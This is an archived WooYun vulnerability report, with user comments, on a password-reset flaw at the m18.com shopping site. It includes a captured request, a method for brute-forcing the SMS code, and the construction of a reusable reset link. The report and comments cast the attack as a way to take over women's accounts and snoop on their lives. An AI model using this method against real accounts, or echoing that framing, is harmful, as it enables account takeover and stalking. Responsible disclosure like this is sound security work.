当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014604

漏洞标题:光棍节屌丝的逆袭专场NO.4---麦考林网站修改任意妹子账号密码漏洞

相关厂商:上海麦考林信息科技有限公司

漏洞作者: 风萧萧

提交时间:2012-11-10 21:10

修复时间:2012-11-15 21:11

公开时间:2012-11-15 21:11

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-11-10: 细节已通知厂商并且等待厂商处理中
2012-11-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

哎呦!凡客是屌丝去的购物网站啊!女神去哪里网上购物呢?麦考林那!所以,屌丝们如果你想了解更多关于女神的生活中的细节信息,请关注这里!

详细说明:

1.进入麦考林的主站吧!第一步找到登录的界面,这里是否仍有你多么熟悉的【忘记密码?】链接,那么轻点这里:

1.jpg


2.2.填写需要重置的账号,由于只是测试漏洞存在,这里只用了我自己的账号:

2.jpg


3.填写好手机号码与图片验证码后,点击【提交】。于是给我的手机号发送了重置密码的短信码(为了与图片验证码区别,这里成为短信码)为【551660】,这里随意的填写了一个短信码100000,点击【重设密码】之前设置好浏览器的代理为burpsuite!

3.jpg


4.抓包的POST请求如下:

POST /Service/ContactService.ashx?Method=PhoneValidationCheckCode HTTP/1.1
Host: login.m18.com
Proxy-Connection: keep-alive
Content-Length: 40
Origin: http://login.m18.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1284.2 Safari/537.13
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://login.m18.com/contact/contactfillinverifycode.aspx?method=GetPwdByPhone&code=53750b5150827ddebc7b05c558e48905&cellphonenum=1*********9&no=7144
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: M18_Passport_UserInfo=oAN7TmaQQlYp5yqS5qTE1HmzzgRJjs0W0f68F74KuSPXRzSlTcgo6+DAI/3v+Dqx44jkWMljommomb03k4zCRW4iIAQX8XxDsVtMNVhIEEBSWQsROeHfE47Ov0lkHZ8NtiZkTyF1XdXKQ72DP0KxuN+7NuAqyXUy8LJlCbrlf8Y/svZCE5OSGePsnBxJkyBQhjU/CmvxXiQvDwXI1oSJ6A==; M18_CID=e2085fe5-c2e6-48bb-80c3-cb2f7518163f; BIGipServerLogin1_Web_Pool=1006741696.20480.0000; __ozlvd814=1352457715
MobilePhone=1*********9&CheckCode=284262

从传输的参数容易判断出来MobilePhone是需要重置密码的手机号,CheckCode参数即为短信码。
5.那么开始爆破吧!设置好需要爆破的参数为CheckCode,设置爆破的线程数为100,看看需要多长时间即可爆破成功。我这里为测试只从100000开始:

麦考林第五步截图.jpg

漏洞证明:

6.通过返回的字节数或者返回的内容得出正确的短信码:
短信码错误时,返回的字节数为313,而短信码正确时字节数为387;
当然也可从返回的内容来判断是否获取正确的短信码,短信码错误时返回内容包含"检验记录不存在"的字样,短信码正确时返回的内容非常重要,后面会用到!

4.jpg

5.jpg


7.经测试仅仅使用8分多钟就破解出短信码,可见危害之大!我拿破解的短信码去重置时,报错了,说短信码错误,难道只能使用一次?

6.jpg


8.木有关系,还记得第6步拿到的返回内容么!

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 115
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 09 Nov 2012 10:46:41 GMT
{msgCode:0,msgStr:'操作成功',urlParam:'code=9c0a3c3392991ca77fbd20391040a170&cellphonenum=1*********9&no=4959'}


构造如下链接:

http://login.m18.com/contact/contactsetnewpassword.aspx?type=GetPwdByPhone&code=9c0a3c3392991ca77fbd2039********&cellphonenum=*********9&no=4959

点击访问,即可进入重置密码的页面!

8.jpg


8.屌丝再次逆袭成功!

9.jpg

10.jpg

修复方案:

1.还有一个很严重的bug,一次取回账号长久可用,我的重置链接如下(怎么获得呢,看第8步),但是评估我的账号被恶意重置以及泄露个人信息的风险,隐去几位字符:
http://login.m18.com/contact/contactsetnewpassword.aspx?type=GetPwdByPhone&code=9c0a3c3392991ca77fbd2039********&cellphonenum=*********9&no=4959
只要拿了上述链接,不用走重置密码的流程即可重新更新密码,另外多次取回密码时的链接时不一样的,但是这些链接都可以同时重置密码,奇葩;
2.6位纯数字短信码的爆破,即平均50万次的请求,我使用了burpsuite测试单台机器100线程,8分多钟即可重置任意一个手机账号!危险啊
3.短信码可以为6位纯数字,甚至可以缩短为4为纯数字;可以不设置图片验证码,甚至可以不用设置短信码的有效期。但是为什么不设置连续5次尝试失败就锁定本次密码重置的请求呢?
4.求20rank,求礼物!

版权声明:转载请注明来源 风萧萧@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-11-15 21:11

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2012-11-10 21:49 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    女神去ELLEshop啊 求攻破

  2. 2012-11-10 23:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    麦考林个毛线妹子,妹子都在蘑菇街啊

  3. 2012-11-11 00:03 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @xsser 出售大量模特资料 联系方式

  4. 2012-11-11 00:49 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)

    快放蘑菇街的修改任意妹子账号密码漏洞啊~~

  5. 2012-11-12 04:15 | 冰锋刺客 ( 普通白帽子 | Rank:113 漏洞数:14 | 请在监护人陪同下与本人交流)

    @风萧萧 你碉堡了

  6. 2012-11-12 13:04 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @风萧萧 麦考林的bug我也找到了 不过需要知道2个数据。有点麻烦!

  7. 2012-11-15 21:51 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    竟然忽略了,唉

  8. 2012-11-15 21:52 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @zzR 大家可以评选10大黑名单厂商了

  9. 2012-11-16 09:44 | 墨水心_Len ( 实习白帽子 | Rank:70 漏洞数:15 | PKAV技术宅 | 每一个有文化的东西,我们都...)

    太大意了。。

  10. 2012-11-16 10:47 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    我尝试多种渠道联系厂商了,希望不要怪我。

  11. 2012-11-16 10:48 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @风萧萧 就当做教程了吧 --

  12. 2012-11-16 10:52 | 路过的菜鸟A ( 实习白帽子 | Rank:50 漏洞数:12 | 路人乙)

    忽略了啊,赶紧去快递门口捡女神扔掉的快递包装袋~~~

  13. 2012-11-16 11:35 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @zzR 被忽略没什么,怕被恶意利用毕竟是商城。希望尽快发现异常并修复

  14. 2012-11-16 11:42 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @风萧萧 您老觉悟真高啊,发现漏洞并提交漏洞是我们的义务

  15. 2012-11-16 15:56 | 啦绯哥 ( 普通白帽子 | Rank:107 漏洞数:20 )

    这种漏洞肯定忽略的,至少对商家没有直接影响,你要是脱裤子,商家就急了

  16. 2012-11-16 16:16 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    看来还是我找的有技术含量 不干给忽略!审核中。。。敬请期待

  17. 2012-11-19 22:21 | th000 ( 路人 | Rank:8 漏洞数:3 | 安全初段~)

    忽略。。。

  18. 2012-11-21 20:48 | 上海麦考林信息科技有限公司(乌云厂商)

    @风萧萧各位白帽子实在抱歉,由于某些原因最近没有及时关注wooyun动态,导致了漏洞被系统忽略。这里向发现漏洞的白帽子表示歉意,感谢各位白帽子对麦考林的关注和支持,我们正在积极修复问题。

  19. 2015-09-18 11:04 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    没有女神的相片我是不会给好评的!